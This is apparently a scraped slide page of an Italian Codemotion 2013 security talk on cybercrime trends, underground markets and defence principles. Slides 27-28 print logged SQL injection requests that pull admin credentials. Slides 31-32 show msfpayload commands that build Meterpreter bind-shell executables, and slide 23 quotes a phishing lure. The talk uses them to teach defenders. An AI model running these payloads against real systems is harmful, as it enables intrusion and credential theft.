Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

Último

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 

Último (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 

Attacchi, bugie e underground digitale by Andrea Pompili

  • 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com ATTACCHI, BUGIE E UNDERGROUND DIGITALE Speaker: Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't
  • 2. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 3. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com « » > Bonifica e Hardening fatta a tappeto un anno prima > Sistemi Operativi Patched all’ultima versione disponibile > Logging integrale di tutte le attività del Sito > 2 Sistemi IPS (Intrusion Prevention System) in cascata
  • 4. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Outside 70% Inside - Accidental 12% Inside - Malicious 9% Inside 5% Unknown 4% Source: http://datalossdb.org/ Statistiche 2012
  • 5. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 7,20% 6,20% 6,10% 5,70% 6,80% 6,80% 29,90% 41,20% 27,20% 34,10% 34,10% 30,70% 62,90% 52,60% 66,70% 60,20% 59,10% 62,50% Attacchi complessivi rilevati dal 2007 Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  • 6. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 76,00% 3,80% 16,80% 3,40% 76,00% 6,50% 13,70% 3,80% 76,40% 6,70% 13,70% 3,20% Impatto degli Attacchi rilevati Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  • 7. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com «Non è obiettivo di questo “focus” riportare in dettaglio i risultati della rilevazione ma analizzando i dati relativi ai valori medi per l’intero campione si può ritenere che i risultati siano: • soddisfacenti per la protezione logica; • molto soddisfacenti per la sicurezza dell’infrastruttura; • sufficienti per la sicurezza dei servizi; • da migliorare per la sicurezza dell’organizzazione. «Possiamo dire che ce l’aspettavamo»
  • 8. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 9. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 10. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 11. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Aki Mon Telecom Shane Atkinson Canter & Siegel Eddie Davidson Peter Francis-Macrae Davis Wolfgang Hawke Jumpstart Technologies Vandar Kushnir Kevin Lipnitz Wayne Mansfield Oleg Nikolaenko Alan Ralsky Dave Rhodes Scott Richter Russian Business Network iFrame Cash SBT Telecom Network Defcon Host Micronnet Ltd. InstallsCash Sendar Argic Richard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011 RBNet
  • 12. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/
  • 13. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 14. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com (*) According to Frank Rieger Chief technology officer at GSMK
  • 15. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
  • 16. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
  • 17. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox. (http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html) Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser- sandbox-first-to-fall/10588)
  • 18. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Blackole Exploit Kit Cool Exploit Kit
  • 19. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  • 20. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 21. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 22. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 23. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Da: hdesk@rcs.it Inviato: Thursday, November 04, 2004 7:48 PM A: xxxxxx@rcs.it Oggetto: Aggiornamento configurazione Salve, riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa di tali problemi e' riscontrabile in una non corretta configurazione del Suo computer che La preghiamo di aggiornare collegandosi al seguente indirizzo: http://xxxx.rcs.it/software/av/index.html La preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e ' disponibile nella pagina indicata. Al termine della configurazione Le apparira' un messaggio di conferma dell'esito positivo dell'aggiornamento. Distinti Saluti Help Desk - Supporto Tecnico RCS RCS Editori S.p.A. - Settore Quotidiani
  • 24. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 25. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 26. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 27. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0" 178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]= 1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a, substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64), floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”
  • 28. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]= 11502+and(select+1+from(select+count(*),concat_ws(0x3a, substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin), repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor( rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10" Web Shell Extension
  • 29. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://evader.stonesoft.com/ http://insecure.org/stf/secnet_ids/secnet_ids.html
  • 30. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 31. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
  • 32. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
  • 33. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
  • 34. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com <#1> Ragiona come un Attaccante in modo da comprendere cosa faranno e come ti attaccheranno <#2> Cerca di capire i loro obiettivi, la capacità che hanno, ma soprattutto i vincoli operativi che hanno <#3> Identifica il valore «percepito» di ciò che vuoi difendere, ma soprattutto cosa vuoi difendere <#4> Lavora su tutto il perimetro di difesa, senza atti di fede <#5> Se la tua difesa è più economica dell’attacco, tu sarai sempre in vantaggio
  • 35. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
  • 36. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian